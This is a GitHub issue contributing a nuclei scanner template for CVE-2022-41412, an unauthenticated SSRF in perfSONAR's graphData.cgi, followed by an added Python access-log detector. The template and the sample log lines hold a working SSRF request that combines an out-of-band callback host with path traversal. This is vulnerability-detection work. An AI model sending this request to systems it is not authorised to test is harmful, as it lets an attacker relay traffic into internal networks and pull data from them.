[nuclei-template] CVE-2022-41412 perfSONAR 4.x-4.4.4 - SSRF
null-hyp0thesis opened this issue
Template Information:
PerfSONAR includes by default a graphData.cgi script, used to graph and visualize data.
There is a flaw in graphData.cgi URL parsing, which allows for unauthenticated users to proxy and relay HTTP/HTTPS traffic through the perfSONAR server.
The vulnerability can potentially be leveraged to exfiltrate or enumerate data from internal web servers.
This vulnerability was patched in perfSONAR version 4.4.5.
Versions 4.0 through 4.4.4 inclusive are affected.
There is a whitelisting function that can mitigate it, but it is disabled by default.
References:
https://github.com/renmizo/CVE-2022-41412
perfsonar/graphs@463e1d9
https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html
Nuclei Template:
```yaml
id: CVE-2022-41412

info:
  name: SSRF via perfSONAR > 4.x <= 4.4.4
  author: null_hypothesis
  severity: high
  reference:
    - https://github.com/renmizo/CVE-2022-41412
    - https://hackerone.com/reports/2445802
    - https://github.com/perfsonar/graphs/commit/463e1d9dc30782d9b1c002143551ec78b74e03bb
    - https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html
  metadata:
    max-request: 1
  tags: ssrf, perfsonar, cve2022

http:
  - method: GET
    path:
      - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url={{interactsh-url}}/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
```
Example Results:
[CVE-2022-41412] [http] [high] https://example.com/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://xxx.oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
It's my first Issue so be gentle :)
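The request shape shown in the template and example result (a `GET` to `graphData.cgi` with `action=ma_data` and an attacker-controlled `url` parameter) is also what a defender would look for in the web server's access log while waiting to upgrade to 4.4.5 or to enable the whitelist. The following Python is an added detection example written for this issue; it is not part of the nuclei template, perfSONAR, or the original report. It assumes a combined-style access log and a hypothetical allowlist of measurement-archive hosts (`ALLOWED_MA_HOSTS`); the log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the measurement-archive hosts this perfSONAR front end is
# expected to query. Anything else in the url= parameter is suspicious.
ALLOWED_MA_HOSTS = {"ma.example.internal"}

# Combined-style access log: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not real traffic): one legitimate graph request,
# one request relaying to an external host with path traversal, one unrelated hit.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Sep/2022:10:00:01 +0000] "GET /perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://ma.example.internal/esmond/perfsonar/archive/&src=10.0.0.1&dest=10.0.0.2 HTTP/1.1" 200 512
10.0.0.5 - - [20/Sep/2022:10:00:02 +0000] "GET /perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://collector.oast.example/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4 HTTP/1.1" 200 77
10.0.0.5 - - [20/Sep/2022:10:00:03 +0000] "GET /toolkit/ HTTP/1.1" 200 1024
"""


def analyze_request(target):
    """Return a list of findings for one request target; [] when nothing is off."""
    parts = urlsplit(target)
    if not parts.path.endswith("/graphData.cgi"):
        return []
    # parse_qs already percent-decodes values, so no second unquote is needed
    params = parse_qs(parts.query)
    findings = []
    for url in params.get("url", []):
        # The template passes a bare host; tolerate both "host/..." and "http://host/..."
        parsed = urlsplit(url if "://" in url else "http://" + url)
        host = (parsed.hostname or "").lower()
        if host not in ALLOWED_MA_HOSTS:
            findings.append(f"url host not allowlisted: {host or url!r}")
        # ".." segments mean the caller is steering the backend request away
        # from the esmond archive path the CGI expects.
        if ".." in parsed.path.split("/"):
            findings.append("path traversal in url parameter")
    return findings


def scan_log(text):
    """Scan access-log text and return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_request(m.group("target"))
        if findings:
            alerts.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "findings": findings,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['ip']} -> {'; '.join(alert['findings'])}")
```

Running it on the constructed log flags only the second line, for both the non-allowlisted host and the `..` traversal. A 200 response on the flagged request is consistent with the CGI having relayed the fetch, which is the behaviour the nuclei matcher confirms out-of-band via interactsh.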
PR (#9497)
Thanks so much for this @jamboro , we appreciate it. And congrats on your first issue! :)